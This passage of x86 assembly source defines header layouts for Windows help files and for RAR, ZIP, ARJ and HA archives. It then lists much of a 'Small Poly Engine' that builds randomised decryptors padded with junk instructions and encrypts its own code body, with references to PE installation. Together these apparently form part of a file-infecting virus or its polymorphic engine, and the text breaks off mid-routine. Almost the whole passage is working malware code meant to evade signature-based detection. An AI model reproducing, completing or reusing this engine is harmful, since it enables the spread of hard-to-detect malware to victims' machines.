4 HLP_START STRUC HLP_START_MAGIC DD ? ;35F3FH HLP_START_DIRECTORYSTART DD ? ;OFFSET OF FILE_HEADER OF INTERNAL DIRECTORY HLP_START_FIRSTFREEBLOCK DD ? ;OFFSET OF FREE_HEADER OR -1L IF NO FREE LIST HLP_START_ENTIREFILESIZE DD ? ;SIZE OF ENTIRE HELP FILE IN BYTES ;CHAR HELPFILECONTENT[ENTIREFILESIZE-16] THE REMAINDER OF THE HELP FILE ENDS FILE_HEADER STRUC FILE_HEADER_RESERVEDSPACE DD ? ;SIZE RESERVED INCLUDING FILE_HEADER FILE_HEADER_USEDSPACE DD ? ;SIZE OF INTERNAL FILE IN BYTES FILE_HEADER_FILEFLAGS DB ? ;NORMALLY 4 ;DB FILECONTENT DUP (USEDSPACE) THE BYTES CONTAINED IN THE INTERNAL FILE ;DB FREESPACE DUP (RESERVEDSPACE-USEDSPACE-9) ENDS SYSTEM_HEADER STRUC ;|SYSTEM SYSTEM_HEADER_MAGIC DW ? ;36CH SYSTEM_HEADER_MINOR DW ? ;HELP FILE FORMAT VERSION NUMBER ;15 = HC30 WINDOWS 3.0 HELP FILE ;21 = HC31 WINDOWS 3.1 HELP FILE ;27 = WMVC/MMVC MEDIA VIEW FILE ;33 = MVC OR HCW 4.00 WINDOWS 95 SYSTEM_HEADER_MAJOR DW ? ;1 SYSTEM_HEADER_GENDATE DD ? ;HELP FILE CREATED SECONDS AFTER 1.1.1980, OR 0 SYSTEM_HEADER_FLAGS DW ? ;USE MINOR AND FLAGS TO FIND OUT HOW THE HELP FILE WAS COMPRESSED: ;MINOR <= 16 NOT COMPRESSED, TOPICBLOCKSIZE 2K ;MINOR > 16 FLAGS=0: NOT COMPRESSED, TOPICBLOCKSIZE 4K ; FLAGS=4: LZ77 COMPRESSED, TOPICBLOCKSIZE 4K ; FLAGS=8: LZ77 COMPRESSED, TOPICBLOCKSIZE 2K ;ADDITIONALLY THE HELP FILE MAY USE PHRASE COMPRESSION (OLDSTYLE OR HALL). ;IF MINOR IS 16 OR LESS, THE HELP FILE TITLE FOLLOWS THE SYSTEMHEADER: ;HELPFILETITLE DB ? DUP (?) - ASCIZ STRING ;IF MINOR IS ABOVE 16, ONE OR MORE SYSTEMREC RECORDS FOLLOW INSTEAD UP TO THE ;INTERNAL END OF THE |SYSTEM FILE: ;SYSTEM_HEADER_RECORDTYPE DW ? ;TYPE OF DATA IN RECORD ;SYSTEM_HEADER_DATASIZE DW ? ;SIZE OF DATA ;SYSTEM_HEADER_DATA DB ? ;DATASIZE DUP (?) ;THERE ARE DIFFERENT RECORDTYPES DEFINED, EACH STORING DIFFERENT DATA. ;THEY MAINLY CONTAIN WHAT WAS SPECIFIED IN THE HELP PROJECT FILE. ;RECORDTYPE DATA ;1 TITLE ASCIZ TITLE HELP FILE TITLE ;2 COPYRIGHT ASCIZ COPYRIGHT COPYRIGHT NOTICE SHOWN IN ABOUTBOX ;3 CONTENTS TOPICOFFSET CONTENTS TOPIC OFFSET OF STARTING TOPIC ;4 CONFIG ASCIZ MACRO ALL MACROS EXECUTED ON OPENING ;5 ICON WINDOWS *.ICO FILE SEE WIN31WH ON ICON FILE FORMAT ;6 WINDOW STRUCT WINDOWS DEFINED IN THE HPJ-FILE ;7 WINDOW TYPEDEF STRUCT VIEWER 2.0 WINDOWS DEFINED IN MVP-FILE ;8 CITATION ASCIZ CITATION THE CITATION PRINTED ;9 LCID DW LCID[4] LANGUAGE ID, WINDOWS 95 (HCW 4.00) ;10 CNT ASCIZ CONTENTFILENAME CNT FILE NAME, WINDOWS 95 (HCW 4.00) ;11 CHARSET DW CHARSET CHARSET, WINDOWS 95 (HCW 4.00) ;12 DEFFONT STRUCT DEFAULT DIALOG FONT, WINDOWS 95 (HCW 4.00) ;12 FTINDEX ASCIZ DTYPE MULTIMEDIA HELP FILES DTYPES ;13 GROUPS ASCIZ GROUP DEFINED GROUPS, MULTIMEDIA HELP FILE ;14 INDEX_S. ASCIZ INDEXSEPARATORS SEPARATORS, WINDOWS 95 (HCW 4.00) ;14 KEYINDEX STRUCT MULTIMEDIA HELP FILES ;18 LANGUAGE ASCIZ LANGUAGE DEFINED LANGUAGE, MULTIMEDIA HELP FILES ;19 DLLMAPS STRUCT DEFINED DLLMAPS, MULTIMEDIA HELP FILES ENDS ;RAR ARCHIVE RAR_SIGN = 21726152H RAR_HEAD_SIGN = 73H RAR_FILE_SIGN = 74H RAR_STORED = 30H RAR_HEAD_HDR STRUC RAR_HEAD_CRC DW ? ;TYPE - RESERVED2 RAR_HEAD_TYPE DB ? ;73H RAR_HEAD_FLAGS DW ? ; 0x01 - VOLUME ATTRIBUTE (ARCHIVE VOLUME) ; 0x02 - ARCHIVE COMMENT PRESENT ; 0x04 - ARCHIVE LOCK ATTRIBUTE ; 0x08 - SOLID ATTRIBUTE (SOLID ARCHIVE) ; 0x10 - UNUSED ; 0x20 - AUTHENTICITY INFORMATION PRESENT RAR_HEAD_SIZE DW ? RAR_RESERVED1 DW ? RAR_RESERVED2 DD ? ENDS ;COMMENT BLOCK PRESENT IF (HEAD_FLAGS & 0x02) != 0 RAR_FILE_HDR STRUC RAR_F_HEAD_CRC DW ? ;0 RAR_F_HEAD_TYPE DB ? ;2 74H RAR_F_HEAD_FLAGS DW ? ;3 ; 0x01 - FILE CONTINUED FROM PREVIOUS VOLUME ; 0x02 - FILE CONTINUED IN NEXT VOLUME ; 0x04 - FILE ENCRYPTED WITH PASSWORD ; 0x08 - FILE COMMENT PRESENT ; 0x10 - INFORMATION FROM PREVIOUS FILES IS USED (SOLID FLAG) ; (FOR RAR 2.0 AND LATER) ; BITS 7 6 5 (FOR RAR 2.0 AND LATER) ; 0 0 0 - DICTIONARY SIZE 64 KB ; 0 0 1 - DICTIONARY SIZE 128 KB ; 0 1 0 - DICTIONARY SIZE 256 KB ; 0 1 1 - DICTIONARY SIZE 512 KB ; 1 0 0 - DICTIONARY SIZE 1024 KB ; 1 0 1 - RESERVED ; 1 1 0 - RESERVED ; 1 1 1 - FILE IS DIRECTORY ; (HEAD_FLAGS & 0x8000) == 1, BECAUSE FULL ; BLOCK SIZE IS HEAD_SIZE + PACK_SIZE RAR_F_HEAD_SIZE DW ? ;5 RAR_COMPRESSED_SIZE DD ? ;7 RAR_ORIGINAL_SIZE DD ? ;B RAR_HOST_OS DB ? ;F DOS=0,WIN32=2 RAR_CRC32 DD ? ;10 RAR_FILE_TIME DW ? ;14 RAR_FILE_DATE DW ? ;16 RAR_REQ_VER DB ? ;18 0FH RAR_METHOD DB ? ;19 30H=STORED RAR_FNAME_SIZE DW ? ;1A RAR_FILE_ATTRIB DD ? ;1C RAR_FNAME LABEL BYTE ;20 ENDS ;FILE_NAME FILE NAME - STRING OF NAME_LEN BYTES SIZE ;COMMENT BLOCK PRESENT IF (HEAD_FLAGS & 0x08) != 0 ;???? OTHER EXTRA INCLUDED BLOCKS - RESERVED FOR FUTURE USE ;ZIP ARCHIVE ZIP_LOCAL_SIGN = 4034B50H ZIP_CENTRAL_SIGN = 2014B50H ZIP_END_SIGN = 6054B50H ZIP_LOCAL_HEADER STRUC ZIP_LOC_SIGN_ DD ? ;0 ('PK',3,4) ZIP_VER_NED_TO_EXTR DW ? ;4 ZIP_FLAGS DW ? ;6 ZIP_COMPRESSION_METHOD DW ? ;8 (0 FOR STORED) ZIP_FILE_TIME DW ? ;A ZIP_FILE_DATE DW ? ;C ZIP_CRC_32 DD ? ;E ZIP_COMPRESSED_SIZE DD ? ;12 ZIP_UNCOMPRESSED_SIZE DD ? ;16 ZIP_SIZE_FNAME DW ? ;1A ZIP_EXTRA_FIELD_LENGTH DW ? ;1C ZIP_LOCAL_FNAME LABEL BYTE ;1E ENDS ;EXTRA FIELD (VARIABLE SIZE) ZIP_CENTRAL_HEADER STRUC ZIP_CENTR_SIGN_ DD ? ;0 ('PK',1,2) ZIP_VER_MADE_BY_ DW ? ;4 ZIP_VER_NED_TO_EXTR_ DW ? ;6 ZIP_FLAGS_ DW ? ;8 ZIP_COMPRESSION_METHOD_ DW ? ;A ZIP_FILE_TIME_ DW ? ;C ZIP_FILE_DATE_ DW ? ;E ZIP_CRC_32_ DD ? ;10 ZIP_COMPRESSED_SIZE_ DD ? ;14 ZIP_UNCOMPRESSED_SIZE_ DD ? ;18 ZIP_SIZE_FNAME_ DW ? ;1C ZIP_EXTRA_FIELD_LENGTH_ DW ? ;1E ZIP_FILE_COMMENT_LENGTH_ DW ? ;20 ZIP_DISK_NUMBER_START_ DW ? ;22 ZIP_INTRNL_FILE_ATTR_ DW ? ;24 ZIP_EXTRNL_FILE_ATTR_ DD ? ;26 ZIP_REL_OFF_OF_LOC_HDR_ DD ? ;2A ZIP_CENTRAL_FNAME LABEL BYTE ;2E ENDS ;EXTRA FIELD (VARIABLE SIZE) ;FILE COMMENT (VARIABLE SIZE) ZIP_END_HEADER STRUC ZIP_END_SIGN_ DD ? ;0 ('PK',5,6) NUM_OF_THIS_DISK DW ? ;4 NUM_OF_THE_START_DISK DW ? ;6 TTL_NUM_OF_ENT_ON_THIS_DISK DW ? ;8 TTL_NUM_OF_ENT_IN_THE_CENT_DIR DW ? ;A SIZE_OF_THE_CENTRAL_DIRECTORY DD ? ;C OFF_OF_STRT_OF_CENT_DIRECTORY DD ? ;10 ZIPFILE_COMMENT_LENGTH DW ? ;14 ENDS ;ZIPFILE COMMENT (VARIABLE SIZE) ;16 ;ARJ ARCHIVE ARJ_SIGN = 0EA60H ARJ_STORED = 0 ARJ_HDR_STRUC STRUC ARJ_HEADER_ID DW ? ;2 HEADER ID (COMMENT AND LOCAL FILE) = 0xEA60 ARJ_BAS_HDR_SIZE DW ? ;28 BASIC HEADER SIZE (FROM 'FIRST_HDR_SIZE' THRU 'COMMENT' BELOW) ;= FIRST_HDR_SIZE + STRLEN(FILENAME) + 1 + STRLEN(COMMENT) + 1 ;= 0 IF END OF ARCHIVE ARJ_FIRST_HDR_SIZE DB ? ;1E FIRST_HDR_SIZE (SIZE UP TO 'EXTRA DATA') ARJ_VER_NUM DB ? ;06 ARCHIVER VERSION NUMBER ARJ_MIN_VER DB ? ;01 MINIMUM ARCHIVER VERSION TO EXTRACT ARJ_HOST_OS DB ? ;00 HOST OS (0 = MSDOS) ARJ_FLAGS DB ? ;10 ARJ FLAGS ;(0x01 = GARBLED_FLAG) INDICATES PASSWORDED FILE ;(0x02 = RESERVED) ;(0x04 = VOLUME_FLAG) INDICATES CONTINUED FILE TO NEXT VOLUME ;(0x08 = EXTFILE_FLAG) INDICATES FILE STARTING POSITION FIELD ;(0x10 = PATHSYM_FLAG) INDICATES PATH TRANSLATED ARJ_COMPRESS_METHOD DB ? ;00 METHOD (0 = STORED) ARJ_FILE_TYPE DB ? ;00 0=BINARY, 1=TEXT ARJ_RESERVED DB ? ;(??? LAST BYTE OF TIME STAMP OF ARJ FILE) ARJ_FILE_TIME DW ? ;DATE TIME STAMP MODIFIED ARJ_FILE_DATE DW ? ARJ_COMPRESSED_SIZE DD ? ;COMPRESSED SIZE ARJ_ORIGINAL_SIZE DD ? ;ORIGINAL SIZE ARJ_CRC32 DD ? ;ORIGINAL FILE'S CRC ARJ_ENTRYNAME_POS DW ? ;0 ENTRYNAME POSITION IN FILENAME ARJ_FILE_ACCESS_MODE DW ? ;0 FILE ACCESS MODE ARJ_HOST_DATA DW ? ;0 HOST DATA (CURRENTLY NOT USED) ARJ_FNAME LABEL BYTE ; ? EXTRA DATA (IF SET EXTFILE_FLAG) ; 4 BYTES FOR EXTENDED FILE POSITION ; ? FILENAME (NULL-TERMINATED) ; ? COMMENT (NULL-TERMINATED) ; 4 BASIC HEADER CRC ; 2 1ST EXTENDED HEADER SIZE (0 IF NONE) = 0 ; ? 1ST EXTENDED HEADER ; 4 1ST EXTENDED HEADER'S CRC (NOT PRESENT IF 0 EXTENDED HEADER SIZE) ; ... ; ? COMPRESSED FILE ENDS ;HA ARCHIVE HA_SIGN = 4148H HA_STORED = 20H ;HAFILE ;0000 HA ;0002 CNT ;0004 HDR1 ;. FILE1 ;. HDR2 ;. FILE2 HA_MAIN_HEADER STRUC HA_M_SIGN DW ? ;0 HA = IDENTIFIER FOR HA ARCHIVE HA_M_FILE_CNT DW ? ;2 NUMBER OF FILES IN ARCHIVE ENDS HA_FILE_HEADER STRUC HA_VER_METHOD DB ? ;0 VER<<4 | TYPE TYPE 0-CPY,1-ASC,2-HSC ; 0xE-DIR 0xF-SPECIAL (20H FOR CPY) HA_COMPRESS_SIZE DD ? ;1 HA_ORIGINAL_SIZE DD ? ;5 HA_CRC32 DD ? ;9 HA_FILE_TIME DW ? ;D HA_FILE_DATE DW ? ;F HA_PATH DB ? ;11 (ZERO IF ISN'T PRESENT) NOTE: ALL ;DIRPATHS SEPARATED BY 0xFF CODE ENDS ;12 ;+N 0 ;+1 NAME ;+N 0 ;+1 LENGTH OF MACHINE SPECIFIC INFORMATION (02H) ;+1 MACHINE SPECIFIC INFORMATION: ; +0 SYSTEM TYPE (0-DOS,1-LINUX,[DEFAULT=1]) ; +1 FILE ATTRIBUTES (BYTE) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SPE.ASI]ÄÄÄ COMMENT / (C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED. THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / ;-------------------------------------- ;SMALL POLY ENGINE (16/32 PART) ;ENTRY: ECX=0,DS=ES=16BIT/BASE=START,SS=FLAT32 ;EXIT: DI=LENGTH DECRYPTOR+CODE+SOME SHIT(FULL LENGTH) - FOR SPE16(ENCRYPT_BUFF) ; =LENGTH DECRYPTOR - FOR SPE32(SPE32_BUFF - DECRYPTOR) OFF_SPE = $-START SPE PROC FAR DWORD_REG ENUM _EAX,_ECX,_EDX,_EBX,_ESP,_EBP,_ESI,_EDI WORD_REG ENUM _AX,_CX,_DX,_BX,_SP,_BP,_SI,_DI BYTE_REG ENUM _AL,_CL,_DL,_BL,_AH,_CH,_DH,_BH SEGM_REG ENUM _ES,_CS,_SS,_DS FREE_SREG = _SS SHL 3 FREE_WREG = 1 SHL _SP ADD_R = 00B ADD_RB = 01B ADD_RD = 10B ADD_RIMM = 11B UNUSED_REG = 0FFH MOV DX,OFF_GET_RAND_2 MOV BX,ADDRESS_BUFF MOV [BX-2],BX CALL GET_RAND_WORD MOV 2 PTR DS:FIRST_MASK,AX XOR BP,BP XOR DI,DI CMP 1 PTR [DI],0E9H JE SPE32 PUSH AX CALL GET_RAND_WORD MOV 2 PTR DS:SECOND_MASK,AX PUSH AX XCHG AX,DI ;AX=0 MOV DI,SEEK_TABLE MOV CL,LEN_DECRYPTOR MOV [DI-2],CX ;SMALL 2 PTR DS:LEN_SEEK MOV SMALL 1 PTR DS:SHIT_FLAG,AL PUSH CX FILL_SEEK: STOSB INC AX LOOP FILL_SEEK MOV AL,0FFH ;END SEEK_TABLE MARKER STOSB POP CX MOV SI,DECRYPTOR REP MOVSB MOV CH,LEN_MAIN_BUFF SHR 9 PUSH DI FILL_BUFF: CALL GET_RAND_WORD STOSW LOOP FILL_BUFF POP DI CALL GET_TRICK CALL GET_RAND_8 ADD AL,LEN_DECRYPTOR XCHG AX,CX ENCODE_SHIT: PUSH CX CALL ENCRYPT_ITER NO_GEN_ENCRYPT: CALL GET_TRICK POP CX LOOP ENCODE_SHIT MOV SI,ADDRESS_BUFF MOV CL,LEN_DECRYPTOR NEXT_CORRECT: LODSW XCHG AX,BX MOV AX,DI SUB AX,SMALL ENCRYPT_BUFF-100H ADD [BX],AX LOOP NEXT_CORRECT DONT_CORRECT: MOV SI,TEMP_DECRYPTOR MOV CL,LEN_DECRYPTOR REP MOVSB ;MOVE AND ENCRYPT CODE XOR SI,SI ;OFFSET START-100H MOV CX,OUR_LEN PUSH DI CX REP MOVSB POP CX DI BX AX ENCRYPT_CODE: XOR [DI],AX SUB AX,BX INC DI LOOP ENCRYPT_CODE CALL GET_RAND_WORD MOV CL,AL INC CX GEN_END_SHIT: CALL GET_RAND_WORD STOSB LOOP GEN_END_SHIT SUB DI,SMALL ENCRYPT_BUFF DB 66H RET ENDP ;====================================== SPE32: CALL DX MOV SMALL 1 PTR DS:WORD_MODE,AL MOV 2 PTR [DI+1],PE_INSTALL-5 MOV DI,RESTORE_REGS MOV CL,LEN_FILL_RESTORE MOV AX,9090H PUSH DI REP STOSB ;FILL NOP MOV DI,LOOP_CR JNE @@ISNOP1 MOV AX,1234H ORG $-2 SHR CX,1 @@ISNOP1: STOSW PUSHF SCASW ;SKIP SHR E/DI POPF MOV AL,2 JNE @@ISNOP2 MOV AL,4 @@ISNOP2: STOSB PUSHF SCASW ;SKIP MOV EBX,[EDI] POPF MOV CL,LEN_FILL_CRYPT MOV AL,90H PUSH DI REP STOSB JE @@ISNOP3 MOV AL,66H @@ISNOP3: STOSB MOV EBP,12345678H OFF_FIXUP = $-START-4 MOV DI,COUNT_REG XCHG AX,CX DEC AX MOV SMALL 2 PTR DS:PUSHED_REGS,AX STOSW ;FILL 7 BYTES STOSW STOSW STOSB MOV 1 PTR [DI-24H],FREE_WREG ;SMALL 1 PTR DS:DIRTY_WREG INC DI MOV SI,INIT_LIST CALL RANDOM_CALL CALL GET_FREE_REG MOV SMALL 1 PTR DS:WORK_REG,BL CALL GEN_PUSH POP BP PUSH DI ;FOR LOOP CALL RANDOM_CALL CALL GET_SHIT CALL CHANGE_WORK_REG_RELO CALL GET_SHIT CALL STORE_WORK_REG_RELO CALL GET_SHIT CALL CHANGE_OFF_REG_RELO ;SI=SMALL 1 PTR DS:DEC_OFF_COUNT MOV SMALL 1 PTR DS:WORD_MODE,0 MOV BL,[SI+2] ;SMALL 1 PTR DS:COUNT_REG AND BL,BL JS CMP_IMM CALL GET_RAND_4 JE CMP_IMM CMP BL,_ECX JNE NO_LOOP CALL GET_RAND_4 XCHG AX,CX MOV AL,0E2H ;LOOP JE SMALL_JI NO_LOOP: MOV AL,1 CALL GEN_DEC ;SI=SMALL 1 PTR DS:DEC_OFF_COUNT DEC AX MOV AL,3 JE NO_SIGNED DEC AX NO_SIGNED: CALL GET_RAND_BYTE JE LET_JNZ DEC AX JNE LET_JA MOV AL,7FH ;JG JMP CALC_JI CMP_IMM: MOV ECX,[SI-4] ;SMALL 4 PTR DS:TOP_ADDRESS MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG AND BL,BL ;_EAX JNE NO_EAX CALL GET_RAND_4 JE NO_EAX MOV AL,3DH ;CMP EAX STOSB STC JMP SAVE_CMP_OFF NO_EAX: MOV AX,0F881H ;CMP OR AH,BL CALL CHECK_SIGN STOSW SAVE_CMP_OFF: XCHG EAX,ECX JNB SIGN_OPCODE STOSD CMP AL,12H ORG $-1 SIGN_OPCODE: STOSB CHOOSE_JI: CALL DX LET_JA: SHL AL,1 LET_JNZ: OR AL,75H ;JNZ CALC_JI: PUSH AX CALL DX XCHG CX,AX POP AX JE SMALL_JI MOV 1 PTR [DI],0FH INC DI ADD AL,10H SMALL_JI: STOSB POP AX SUB AX,DI DEC AX JCXZ IS_SMALL SUB AX,3 CWDE STOSD CMP AL,12H ORG $-1 IS_SMALL: STOSB CALL GET_SHIT CALL GET_RAND_4 MOV AX,0FFC4H MOV SMALL 2 PTR DS:ADDRESS_MODE,AX MOV AL,_ESP JE LET_ESP TRY_NEXT: MOV SI,OFF_REG CALL GET_RAND_4 ADD SI,AX MOV AL,[SI] CMP AL,0FFH JE TRY_NEXT MOV CL,90H ;50H-0C0H PUSH AX CALL MOVE_TO POP AX LET_ESP: PUSH AX CALL GET_RAND_3 DEC AX XCHG AX,SI JS GO_RETN MOV CX,0E0FFH ;JMP REG JE JMP_ESP_X MOV CH,0D0H ;CALL REG MOV 2 PTR [SI],PE_INSTALL_POP-5 CALL GET_RAND_WORD MOV SMALL 4 PTR DS:INTRUD_OFF,EAX JMP_ESP_X: POP AX OR CH,AL XCHG AX,CX JMP JMP_ESP GO_RETN: POP AX ADD AL,50H ;PUSH STOSB CALL GET_SHIT CALL DX ADD AL,0C2H STOSB MOV AL,AH JP NO_ZERO_FILL JMP_ESP: STOSW NO_ZERO_FILL: XCHG AX,DI SUB AX,SMALL SPE32_BUFF MOV SMALL 2 PTR DS:ENCRYPTOR_LEN,AX POP DI PUSH AX MOV SI,PUSHED_REGS MOV BX,2 NEXT_REST_REG: MOV AL,8BH ;MOV DREG,[ESP+XXXXXXXX] STOSB MOV AL,[BX+SI] SHL AL,3 OR AL,84H MOV AH,24H STOSW MOVZX EAX,1 PTR [SI] SHL AX,2 ADD EAX,SMALL 4 PTR DS:CURRENT_LEN STOSD INC BX DEC 1 PTR [SI] JNS NEXT_REST_REG POP DI DB 66H RETF ;-------------------------------------- CHK_MODE: CMP SMALL 1 PTR DS:WORD_MODE,0 RETN ;-------------------------------------- CHK_MODE_PRFX: PUSH AX CALL CHK_MODE JE @@NO_WMODE MOV AL,66H ;TURN TO 16BIT REG STOSB @@NO_WMODE: POP AX RETN ;-------------------------------------- CHK_MODE_SZ: CALL CHK_MODE MOV AL,4 JE @@NO_WMODE MOV AL,2 @@NO_WMODE: RETN ;-------------------------------------- ;ENTRY:BL=REG NUMBER GEN_PUSH: PUSH BX SI MOV AL,BL MOV SI,PUSHED_REGS INC 2 PTR [SI] MOV BX,[SI] MOV [BX+SI+2],AL ADD AL,50H ;PUSH STOSB ADD SMALL 2 PTR DS:COUNT_RET,4 POP SI BX RETN ;-------------------------------------- ;ENTRY: SI=FIRST OFFSET,AL=HIGH LIMIT RANDOM_CALL: LODSB CBW MOV CX,AX CALL GET_RAND_BYTE SHL AX,1 XCHG AX,BX MOV AX,[BX+SI] XCHG AX,[SI] MOV [BX+SI],AX RCALL_NEXT: PUSH CX SI CALL GET_SHIT CALL 2 PTR [SI] POP SI CX LODSW LOOP RCALL_NEXT NO_INIT: RETN ;-------------------------------------- CHANGE_WORK_REG = $-START CHANGE_WORK_REG_RELO: MOV BX,MASK_REG MOV AL,UNUSED_REG CMP AL,[BX+3] ;SMALL 1 PTR DS:CHG_WR_FLAG JNE NO_INIT CMP AL,[BX+3+1] ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_INIT INC 1 PTR [BX+3] ;SMALL 1 PTR DS:CHG_WR_FLAG PUSH BX CALL CHANGE_ESP POP BX CALL CHK_MODE JE @@NO_WMODE MOV AL,66H CALL BUILD_CBYTE @@NO_WMODE: MOV CL,[BX+1] ;SMALL 1 PTR DS:WORK_REG MOV CH,UNUSED_REG CMP CH,[BX] JE GO_GET_OP32 CALL GET_RAND_4 JNE NO_GET_OP32 GO_GET_OP32: CALL CHK_MODE MOV AL,LEN_OP32_IMM JE GET_OP32 DEC AX ;SKIP BSWAP WITH 66H PREFIX JMP GET_OP32 NO_GET_OP32: MOV SI,OP32_REG_CHG CALL GET_RAND_3 ADD SI,AX MOVSB MOV AL,[SI+LEN_OP32_REG_CHG-1] MOV AH,0D8H CALL BUILD_CRYPT MOV CH,[BX] CALL DX JE NO_XCHG XCHG CL,CH XOR 1 PTR [DI-1],2 NO_XCHG: SHL CL,3 OR CL,CH XCHG AX,CX OR AL,0C0H STOSB RETN ;-------------------------------------- CHANGE_MASK_REG = $-START CALL CHANGE_ESP MOV CL,SMALL 1 PTR DS:MASK_REG AND CL,CL JS OUT_CHG_MASK XOR CH,CH MOV AL,LEN_OP32_IMM GET_OP32: MOV SI,OP32_IMM CALL GET_RAND_BYTE SHL AX,1 XCHG AX,BX JNE NO_BTC MOV AL,0FH CALL BUILD_CBYTE NO_BTC: AND CH,CH JE NO_REVERSE_OP NEG BX MOV AX,[BX+SI-2] CALL BUILD_CRYPT NEG BX STC NO_REVERSE_OP: MOV AX,[BX+SI] JB REVERSE_OP CALL BUILD_CRYPT REVERSE_OP: OR AH,CL CMP AL,90H JNE BINARY_OPCODE MOV AL,AH STOSB RETN BINARY_OPCODE: STOSW CMP AL,0FH JE OUT_CHG_MASK CMP AL,0D1H JAE OUT_CHG_MASK CMP AL,81H PUSHF CALL GET_RAND_WORD POPF JE STOS_DWORD AND AL,1FH BUILD_CBYTE: STOSB BUILD_BYTE: MOV DS:[BP],AL INC BP OUT_CHG_MASK: RETN STOS_DWORD: AND CH,CH JE @@NO_WMODE CALL CHK_MODE JE @@NO_WMODE STOSW JMP BUILD_CRYPT @@NO_WMODE: STOSD CALL BUILD_CRYPT32 JMP JUST_INC ;-------------------------------------- BUILD_CRYPT32: DB 66H BUILD_CRYPT: MOV DS:[BP],AX JUST_INC: INC BP INC BP RETN ;-------------------------------------- MOV_WORK_REG = $-START CALL CHANGE_ESP MOV SI,WORK_REG INC 1 PTR [SI+3] ;SMALL 1 PTR DS:SET_WR_FLAG MOV CL,30H ;-------------------------------------- ;ENTRY: CL=30H (PUSH [][]+XX) OR CL=90H (PUSH DREG) ; 1 PTR [SI]=REG MOVE_TO: MOV BL,[SI] CALL GET_RAND_3 DEC AX JNE NO_MOV MOV AL,8BH ;MOV JMP SAVE_ADDRESS NO_MOV: JNS NO_PUSH CALL CHK_MODE_PRFX AND CL,CL PUSHF JS NO_FF STOSB NO_FF: MOV BL,CL ;PUSH CALL PUSH_CASE POPF JNS IS_FF DEC DI IS_FF: CALL GET_SHIT MOV AL,58H ;POP OR AL,[SI] JMP CHK_MODE_PSTOR NO_PUSH: CALL MOV_ZERO32 MOV SI,OP32_REG CALL GET_RAND_3 ADD SI,AX LODSB SAVE_ADDRESS: CALL CHK_MODE_PSTOR SHL BL,3 PUSH_CASE: MOV AX,SMALL 2 PTR DS:ADDRESS_MODE ADD AL,BL MOV EBX,SMALL 4 PTR DS:DELTA_VALUE CMP AH,0FFH JE NO_EXT_OPCODE STOSW TEST AH,0C0H JNE STORE_DWORD CMP AL,12H ORG $-1 NO_EXT_OPCODE: STOSB AND AL,0C0H JP NO_STORE JS STORE_DWORD XCHG AX,BX STOSB NO_STORE: RETN STORE_DWORD: XCHG EAX,EBX GO_STOS_DWORD: STOSD RETN ;-------------------------------------- STORE_WORK_REG = $-START STORE_WORK_REG_RELO: MOV AL,UNUSED_REG MOV SI,DEC_ESP_COUNT CMP AL,[SI-1] ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_STORE_WR CMP AL,[SI-2] ;SMALL 1 PTR DS:CHG_WR_FLAG JE NO_STORE_WR CMP AL,[SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG JNE NO_STORE_WR INC 1 PTR [SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG XOR AL,[SI] ;SMALL 1 PTR DS:DEC_ESP_COUNT JS VIA_DEC_ESP CALL CHK_MODE_SZ MOV [SI],AL CALL DX JE VIA_DEC_ESP MOV AL,50H ;PUSH OR AL,[SI-4] ;SMALL 1 PTR DS:WORK_REG CHK_MODE_PSTOR: CALL CHK_MODE_PRFX STOS_BYTE: STOSB NO_STORE_WR: RETN VIA_DEC_ESP: MOV AL,[SI] AND AL,AL JNE DEC_ESP MOV AL,89H ;MOV CALL CHK_MODE_PSTOR CALL GET_RAND_3 ROR AL,2 OR AL,4 MOV AH,[SI-4] ;SMALL 1 PTR DS:WORK_REG SHL AH,3 OR AL,AH MOV AH,24H STOSW TEST AL,0C0H JE NO_STORE_WR MOV AL,0 JNS STOS_BYTE XOR EAX,EAX GO1_STOS_DWORD: JMP GO_STOS_DWORD DEC_ESP: MOV BL,_ESP CALL GEN_DEC JMP VIA_DEC_ESP ;-------------------------------------- ;ENTRY: AL=MAX DEC VALUE, BL=REGISTER ;EXIT : AL=DEC VALUE GEN_DEC: CALL GET_SHIT CALL GET_RAND_BYTE INC AX MOVZX ECX,AX CALL GET_RAND_3 JNE NO_DEC MOV AL,48H ;DEC OR AL,BL STOSB DEC 1 PTR [SI] RETN NO_DEC: SUB [SI],CL CALL DX SHL AL,1 OR AL,81H STOSB PUSHF CALL DX MOV AL,0E8H ;SUB JE IS_SUB MOV AL,0C0H ;ADD NEG ECX IS_SUB: OR AL,BL STOSB XCHG EAX,ECX POPF JP GO1_STOS_DWORD STOSB NO_CHG_OFF: RETN ;-------------------------------------- CHANGE_OFF_REG = $-START 